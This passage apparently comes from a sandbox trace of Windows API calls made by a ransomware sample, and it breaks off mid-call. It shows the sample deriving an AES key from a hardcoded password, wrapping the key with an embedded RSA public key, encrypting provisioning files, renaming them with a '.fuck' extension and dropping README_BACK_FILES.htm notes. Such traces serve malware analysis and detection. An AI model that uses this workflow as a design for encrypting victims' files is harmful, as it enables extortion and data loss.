ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.205] CryptEncrypt (in: hKey=0x28e86f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.205] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.205] CloseHandle (hObject=0xffffffff) returned 1 [0240.206] CloseHandle (hObject=0xffffffff) returned 1 [0240.206] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.206] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.206] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.gsg")) returned 0 [0240.207] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\runtime.xml.fuck")) returned 0 [0240.207] CryptDestroyHash (hHash=0x28e8478) returned 1 [0240.207] CryptDestroyKey (hKey=0x28e86f8) returned 1 [0240.207] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.207] FindNextFileA (in: hFindFile=0x28e83f8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.207] FindClose (in: hFindFile=0x28e83f8 | out: hFindFile=0x28e83f8) returned 1 [0240.207] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.208] AreFileApisANSI () returned 1 [0240.208] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.208] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.208] GetLastError () returned 0x5 [0240.208] GetLastError () returned 0x5 [0240.208] FindNextFileA (in: hFindFile=0x28e84b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.208] FindClose (in: hFindFile=0x28e84b8 | out: hFindFile=0x28e84b8) returned 1 [0240.208] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\readme_back_files.htm")) returned 0xffffffff [0240.209] AreFileApisANSI () returned 1 [0240.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.209] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9aec5bda-1e87-46b3-bb96-1a01c606555e}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.209] GetLastError () returned 0x5 [0240.209] GetLastError () returned 0x5 [0240.209] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.209] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e88b8 [0240.209] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.210] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.210] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.210] GetLastError () returned 0x5 [0240.210] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml")) returned 0x20 [0240.210] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.210] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.211] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.211] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.211] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.213] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.213] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.213] CryptHashData (hHash=0x28e89b8, pbData=0x27e25d8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.213] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e89b8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e89f8) returned 1 [0240.213] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.213] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.213] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d44e0) returned 1 [0240.220] CryptImportPublicKeyInfo (in: hCryptProv=0x28d44e0, dwCertEncodingType=0x1, pInfo=0x28c7e08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7e38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7e40*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e83f8) returned 1 [0240.220] CryptEncrypt (in: hKey=0x28e83f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.220] CryptEncrypt (in: hKey=0x28e83f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d49a8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d49a8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.220] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d49a8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.220] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.220] CryptEncrypt (in: hKey=0x28e89f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.220] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.220] CloseHandle (hObject=0xffffffff) returned 1 [0240.220] CloseHandle (hObject=0xffffffff) returned 1 [0240.220] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.221] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.221] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.gsg")) returned 0 [0240.221] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml.fuck")) returned 0 [0240.222] CryptDestroyHash (hHash=0x28e89b8) returned 1 [0240.222] CryptDestroyKey (hKey=0x28e89f8) returned 1 [0240.222] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.222] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.222] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.222] GetLastError () returned 0x5 [0240.222] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml")) returned 0x20 [0240.222] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.223] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.223] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.224] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.224] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28d4d60) returned 1 [0240.226] CryptCreateHash (in: hProv=0x28d4d60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.226] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.226] CryptHashData (hHash=0x28e8478, pbData=0x27e2498, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.226] CryptDeriveKey (in: hProv=0x28d4d60, Algid=0x6610, hBaseData=0x28e8478, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8438) returned 1 [0240.226] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.226] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.226] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28d4a30) returned 1 [0240.227] CryptImportPublicKeyInfo (in: hCryptProv=0x28d4a30, dwCertEncodingType=0x1, pInfo=0x28c7ed8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7f08*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7f10*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e8678) returned 1 [0240.227] CryptEncrypt (in: hKey=0x28e8678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.227] CryptEncrypt (in: hKey=0x28e8678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d4ab8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28d4ab8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.228] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28d4ab8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.228] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.228] CryptEncrypt (in: hKey=0x28e8438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.228] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.228] CloseHandle (hObject=0xffffffff) returned 1 [0240.228] CloseHandle (hObject=0xffffffff) returned 1 [0240.228] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0240.228] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0240.229] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.gsg")) returned 0 [0240.229] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml.fuck")) returned 0 [0240.230] CryptDestroyHash (hHash=0x28e8478) returned 1 [0240.230] CryptDestroyKey (hKey=0x28e8438) returned 1 [0240.230] CryptReleaseContext (hProv=0x28d4d60, dwFlags=0x0) returned 1 [0240.230] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.230] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8438 [0240.230] FindNextFileA (in: hFindFile=0x28e8438, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.230] FindNextFileA (in: hFindFile=0x28e8438, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.230] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x28e8478 [0240.231] FindNextFileA (in: hFindFile=0x28e8478, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.231] FindNextFileA (in: hFindFile=0x28e8478, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0240.231] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0240.231] GetLastError () returned 0x5 [0240.231] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0240.231] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0240.231] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.232] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.232] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0240.232] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28ab150) returned 1 [0240.234] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0240.234] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.234] CryptHashData (hHash=0x28e8638, pbData=0x27e2538, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.235] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e89b8) returned 1 [0240.235] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.235] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.235] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f6cd8) returned 1 [0240.235] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6cd8, dwCertEncodingType=0x1, pInfo=0x28c79f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, 